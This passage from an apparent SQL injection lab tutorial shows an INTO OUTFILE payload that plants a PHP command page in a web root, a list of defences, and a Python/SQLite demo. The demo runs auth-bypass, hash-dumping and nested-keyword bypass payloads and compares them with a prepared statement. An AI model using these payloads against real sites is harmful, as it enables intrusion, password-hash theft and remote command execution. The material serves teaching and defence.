' union select '','' into outfile 'C:\\xampp\\htdocs\\sqlinjection.php';#
This works only if the database user has the FILE privilege and the MySQL server can
write into the web root. Once the file has been written, we simply run commands from the
browser by appending ?cmd=command. For example, 192.168.10.20/sqlinjection.php?cmd=dir
gives us:
We now have command execution on the victim's machine, with the privileges of the web
server process.
c) Defenses against SQL Injection
Change the default password of the root user.
Remove all default stored procedures from the server.
Filter characters that can do harm, such as quotes, semicolons, : and #, as soon as a
query request arrives from outside.
Update the SQL server with the latest patches.
Block sensitive SQL keywords with a firewall right at the input.
Encrypt (hash) the stored passwords.
Strip the keywords SELECT, DELETE, INSERT, ... from queries coming from outside.
Filtering characters and keywords is a blacklist and can be bypassed, for example by
nesting or encoding the keyword; the reliable fix is to pass user input to the database
as a bound parameter of a prepared statement instead of concatenating it into the query
text.
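An added example (not code from the Athena document or from DVWA) that replays the exploitation steps of section b) against the same query shape, then puts the keyword-stripping advice from the list above beside a parameterized query. It uses SQLite so that it runs offline; the MySQL-only pieces are swapped for their SQLite counterparts (the `-- ` comment instead of `#`, sqlite_master instead of information_schema.tables, and no INTO OUTFILE). The users rows are constructed.

```python
"""SQL injection against the DVWA-style query, with a blacklist 'fix' and the real fix."""
import re
import sqlite3

QUERY_TEMPLATE = "SELECT first_name, last_name FROM users WHERE user_id = '%s'"


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the dvwa database (constructed rows, MD5 hashes as DVWA stores them)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
        (2, "Gordon", "Brown", "e99a18c4428cb38d5f260853678922e03"),
        (3, "Hack", "Me", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    ])
    return con


def lookup_vulnerable(con, user_id: str):
    """DVWA low level: the user's input is spliced into the SQL text."""
    return con.execute(QUERY_TEMPLATE % user_id).fetchall()


KEYWORDS = re.compile(r"select|insert|delete|union", re.I)


def lookup_blacklist(con, user_id: str):
    """The 'strip SELECT/INSERT/DELETE' advice: one pass of keyword removal, then splice."""
    return con.execute(QUERY_TEMPLATE % KEYWORDS.sub("", user_id)).fetchall()


def lookup_safe(con, user_id: str):
    """Prepared statement: the input is bound as a value and can never change the query."""
    return con.execute("SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)).fetchall()


def attempt(lookup, con, payload):
    """Run a lookup and return its rows, or the database error text the attacker would see."""
    try:
        return lookup(con, payload)
    except sqlite3.Error as exc:
        return f"error: {exc}"


# Payloads from section b), rewritten in SQLite dialect.
BYPASS_AUTH = "1' OR 1=1-- "                                                      # page: 1' or 1=1#
LIST_TABLES = "a' UNION SELECT name, sql FROM sqlite_master WHERE type='table"  # page: information_schema.tables
DUMP_HASHES = "a' UNION SELECT first_name, password FROM users WHERE '1'='1"
# Nested keywords: one pass of removal turns UNUNIONION into UNION and SELSELECTECT into SELECT.
NESTED_DUMP = "a' UNUNIONION SELSELECTECT first_name, password FROM users WHERE '1'='1"

if __name__ == "__main__":
    db = setup_db()
    for label, payload in [("bypass", BYPASS_AUTH), ("tables", LIST_TABLES),
                           ("dump", DUMP_HASHES), ("nested dump", NESTED_DUMP)]:
        print(f"{label:12} vulnerable: {attempt(lookup_vulnerable, db, payload)}")
        print(f"{label:12} blacklist : {attempt(lookup_blacklist, db, payload)}")
        print(f"{label:12} safe      : {attempt(lookup_safe, db, payload)}")
```

The blacklist never touches the first payload at all, since it contains no keyword, and the nested payload survives a single pass of removal; the parameterized lookup returns nothing for every payload because the whole string is compared against user_id as a value. In PHP against MySQL the equivalent is a PDO prepared statement or mysqli bind_param.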